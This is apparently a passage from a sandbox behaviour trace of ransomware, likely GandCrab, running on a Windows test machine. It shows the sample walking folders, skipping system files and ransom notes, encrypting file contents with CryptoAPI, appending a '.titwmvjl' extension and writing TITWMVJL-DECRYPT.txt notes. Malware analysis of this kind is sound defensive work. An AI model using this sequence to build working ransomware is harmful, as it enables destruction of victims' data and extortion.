x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0094.654] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0094.655] CloseHandle (hObject=0x2bc) returned 1 [0094.655] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.655] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.655] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x27, wMilliseconds=0x3c3)) [0094.655] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.655] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0094.656] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0094.656] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\d2ca4a09d2ca4deb61a.lock") returned 84 [0094.656] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\mzwy6pg on\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0094.656] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.657] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.657] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\") returned 60 [0094.657] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\*" [0094.657] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503778 [0094.657] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.657] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0094.658] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.658] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.658] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0094.658] lstrcmpW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2=".") returned 1 [0094.658] lstrcmpW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2="..") returned 1 [0094.658] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\", lpString2="a 0e_Zi0AwJ3T.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\a 0e_Zi0AwJ3T.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\a 0e_Zi0AwJ3T.jpg" [0094.658] lstrlenW (lpString=".titwmvjl") returned 9 [0094.658] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\a 0e_Zi0AwJ3T.jpg") returned 77 [0094.658] VirtualAlloc (lpAddress=0x0, dwSize=0xda, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.658] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\a 0e_Zi0AwJ3T.jpg.titwmvjl") returned 86 [0094.658] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\a 0e_Zi0AwJ3T.jpg") returned 77 [0094.658] lstrlenW (lpString=".jpg") returned 4 [0094.658] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.658] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".jpg ") returned 5 [0094.658] lstrcmpiW (lpString1=".jpg", lpString2=".titwmvjl") returned -1 [0094.658] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.659] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\a 0e_Zi0AwJ3T.jpg") returned 77 [0094.659] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\a 0e_Zi0AwJ3T.jpg") returned 77 [0094.659] lstrcmpiW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2="desktop.ini") returned -1 [0094.659] lstrcmpiW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2="autorun.inf") returned -1 [0094.659] lstrcmpiW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2="ntuser.dat") returned -1 [0094.659] lstrcmpiW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2="iconcache.db") returned -1 [0094.659] lstrcmpiW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2="bootsect.bak") returned -1 [0094.659] lstrcmpiW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2="boot.ini") returned -1 [0094.659] lstrcmpiW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2="ntuser.dat.log") returned -1 [0094.659] lstrcmpiW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2="thumbs.db") returned -1 [0094.659] lstrcmpiW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.659] lstrcmpiW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.659] lstrcmpiW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2="KRAB-DECRYPT.html") returned -1 [0094.659] lstrcmpiW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2="CRAB-DECRYPT.html") returned -1 [0094.659] lstrcmpiW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2="KRAB-DECRYPT.txt") returned -1 [0094.659] lstrcmpiW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2="CRAB-DECRYPT.txt") returned -1 [0094.659] lstrcmpiW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2="ntldr") returned -1 [0094.659] lstrcmpiW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2="NTDETECT.COM") returned -1 [0094.659] lstrcmpiW (lpString1="a 0e_Zi0AwJ3T.jpg", lpString2="Bootfont.bin") returned -1 [0094.659] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\a 0e_Zi0AwJ3T.jpg") returned 77 [0094.659] lstrlenW (lpString=".jpg") returned 4 [0094.659] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.659] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".jpg ") returned 5 [0094.659] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.660] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.660] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\a 0e_Zi0AwJ3T.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\mzwy6pg on\\a 0e_zi0awj3t.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0094.660] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.660] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0094.661] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.661] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.661] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0094.661] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.662] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.662] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.662] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0094.662] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.662] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.662] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.662] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.662] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0094.663] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.663] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.663] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.663] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0094.663] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.663] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.663] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.663] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.663] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0094.664] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.664] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5037b8) returned 1 [0094.664] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.664] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0094.664] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.664] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0094.664] GetLastError () returned 0x0 [0094.665] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.665] CryptDestroyKey (hKey=0x5037b8) returned 1 [0094.665] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.665] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.665] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.665] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0094.665] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.665] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5037f8) returned 1 [0094.666] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.666] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0094.666] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.666] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0094.666] GetLastError () returned 0x0 [0094.666] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.666] CryptDestroyKey (hKey=0x5037f8) returned 1 [0094.666] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.666] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.666] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.667] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.667] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0xec2, lpOverlapped=0x0) returned 1 [0094.678] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffff13e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.678] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xec2, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0xec2, lpOverlapped=0x0) returned 1 [0094.679] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.679] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0094.705] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.710] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.710] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.710] CloseHandle (hObject=0x2c4) returned 1 [0094.711] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\a 0e_Zi0AwJ3T.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\mzwy6pg on\\a 0e_zi0awj3t.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\a 0e_Zi0AwJ3T.jpg.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\mzwy6pg on\\a 0e_zi0awj3t.jpg.titwmvjl"), dwFlags=0x1) returned 1 [0094.712] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.712] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0094.712] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0094.712] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0094.712] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\d2ca4a09d2ca4deb61a.lock" [0094.712] lstrlenW (lpString=".titwmvjl") returned 9 [0094.712] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\d2ca4a09d2ca4deb61a.lock") returned 84 [0094.712] VirtualAlloc (lpAddress=0x0, dwSize=0xe8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.713] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 93 [0094.713] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\d2ca4a09d2ca4deb61a.lock") returned 84 [0094.713] lstrlenW (lpString=".lock") returned 5 [0094.713] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.713] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0094.713] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.713] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.713] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0094.713] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0094.713] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0094.713] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\TITWMVJL-DECRYPT.txt" [0094.713] lstrlenW (lpString=".titwmvjl") returned 9 [0094.713] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\TITWMVJL-DECRYPT.txt") returned 80 [0094.714] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.714] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 89 [0094.714] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\TITWMVJL-DECRYPT.txt") returned 80 [0094.714] lstrlenW (lpString=".txt") returned 4 [0094.714] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.714] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0094.714] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0094.714] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.714] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\TITWMVJL-DECRYPT.txt") returned 80 [0094.714] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\TITWMVJL-DECRYPT.txt") returned 80 [0094.714] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0094.714] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0094.714] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0094.714] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0094.714] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0094.714] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0094.714] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0094.714] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0094.714] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.715] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0094.715] lstrcmpW (lpString1="wx1pEowPOYWi", lpString2=".") returned 1 [0094.715] lstrcmpW (lpString1="wx1pEowPOYWi", lpString2="..") returned 1 [0094.715] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\", lpString2="wx1pEowPOYWi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi" [0094.715] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\" [0094.715] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0094.715] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.715] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0094.715] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.715] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0094.715] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.715] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0094.716] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.716] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0094.716] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.716] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.716] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\\\TITWMVJL-DECRYPT.txt") returned 94 [0094.716] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\mzwy6pg on\\wx1peowpoywi\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0094.717] lstrlenW 